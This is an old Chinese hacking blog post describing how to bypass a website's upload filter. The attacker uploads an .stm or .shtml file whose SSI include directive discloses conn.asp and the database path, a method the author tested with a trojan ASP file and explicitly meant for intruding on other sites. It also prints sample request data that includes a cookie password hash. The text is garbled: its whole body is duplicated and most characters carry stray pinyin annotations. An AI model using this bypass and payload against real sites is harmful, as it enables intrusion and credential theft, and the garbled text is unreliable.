當(dāng)網(wǎng)站不允許上傳asp cer cdx htr文件時(shí)的一個(gè)解決方法!
更新時(shí)間:2006年12月07日 00:00:00 作者:
前些天向lcx大哥求教關(guān)于web上傳的問題,說起利用stm來上傳,還能執(zhí)行程序,不解,就給我了一段代碼:
見lcx大哥給的一段代碼
說保存為stm或者shtml看看,運(yùn)行如下:
HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate
當(dāng)前文件名稱:F:\Web\1.stm
Web服務(wù)器的名稱和版本:Microsoft-IIS/5.0
主機(jī)名:localhost
端口:80
客戶或客戶代理IP地址:127.0.0.1
客戶或客戶代理主機(jī)名:127.0.0.1
PATH_INFO 的值,但帶有擴(kuò)展為某個(gè)目錄規(guī)范的虛擬路徑:F:\Web\1.stm
客戶端給出附加路徑信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
一直不解!
今天在幻影旅團(tuán)看到了一段話
引用
當(dāng)網(wǎng)站不允許上傳asp cer cdx htr等文件時(shí), 上傳一個(gè)stm文件, 內(nèi)容為:
<!--#include file="conn.asp"-->
直接請(qǐng)求這個(gè)stm文件, conn.asp就一覽無遺, 數(shù)據(jù)庫路徑也就到手啦!
并且又看了那篇shtml的介紹后,恍然大悟,終于明白了!
原來就是如上所說的,
[color=Green]<!--#include file="conn.asp"-->
就是一條SSI指令,其作用是將"info.htm"的內(nèi)容拷貝到當(dāng)前的頁面中,當(dāng)訪問者來瀏覽時(shí),會(huì)看到其它HTML文檔一樣顯示info.htm其中的內(nèi)容。[/color]
我在本地試驗(yàn)成功!在我的iis目錄下建了一個(gè)test.stm文件,內(nèi)容為:
<!--#include file="ok.asp"-->
又在同一目錄下放了一個(gè)我的一個(gè)木馬文件ok.asp
在瀏覽器中請(qǐng)求test.stm,沒有什么反映,一片空白。
但是一查看源代碼,狂暈,原來就是我的asp文件的內(nèi)容!
這樣我們就可以利用這個(gè)來獲取要入侵的web的conn文件來獲得數(shù)據(jù)庫路徑,
但是一個(gè)前提是服務(wù)器的對(duì)stm或者shtml的擴(kuò)展沒有刪除!
再次感謝lcx大哥的指導(dǎo)!
見lcx大哥給的一段代碼
說保存為stm或者shtml看看,運(yùn)行如下:
HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate
當(dāng)前文件名稱:F:\Web\1.stm
Web服務(wù)器的名稱和版本:Microsoft-IIS/5.0
主機(jī)名:localhost
端口:80
客戶或客戶代理IP地址:127.0.0.1
客戶或客戶代理主機(jī)名:127.0.0.1
PATH_INFO 的值,但帶有擴(kuò)展為某個(gè)目錄規(guī)范的虛擬路徑:F:\Web\1.stm
客戶端給出附加路徑信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
一直不解!
今天在幻影旅團(tuán)看到了一段話
引用
當(dāng)網(wǎng)站不允許上傳asp cer cdx htr等文件時(shí), 上傳一個(gè)stm文件, 內(nèi)容為:
<!--#include file="conn.asp"-->
直接請(qǐng)求這個(gè)stm文件, conn.asp就一覽無遺, 數(shù)據(jù)庫路徑也就到手啦!
并且又看了那篇shtml的介紹后,恍然大悟,終于明白了!
原來就是如上所說的,
[color=Green]<!--#include file="conn.asp"-->
就是一條SSI指令,其作用是將"info.htm"的內(nèi)容拷貝到當(dāng)前的頁面中,當(dāng)訪問者來瀏覽時(shí),會(huì)看到其它HTML文檔一樣顯示info.htm其中的內(nèi)容。[/color]
我在本地試驗(yàn)成功!在我的iis目錄下建了一個(gè)test.stm文件,內(nèi)容為:
<!--#include file="ok.asp"-->
又在同一目錄下放了一個(gè)我的一個(gè)木馬文件ok.asp
在瀏覽器中請(qǐng)求test.stm,沒有什么反映,一片空白。
但是一查看源代碼,狂暈,原來就是我的asp文件的內(nèi)容!
這樣我們就可以利用這個(gè)來獲取要入侵的web的conn文件來獲得數(shù)據(jù)庫路徑,
但是一個(gè)前提是服務(wù)器的對(duì)stm或者shtml的擴(kuò)展沒有刪除!
再次感謝lcx大哥的指導(dǎo)!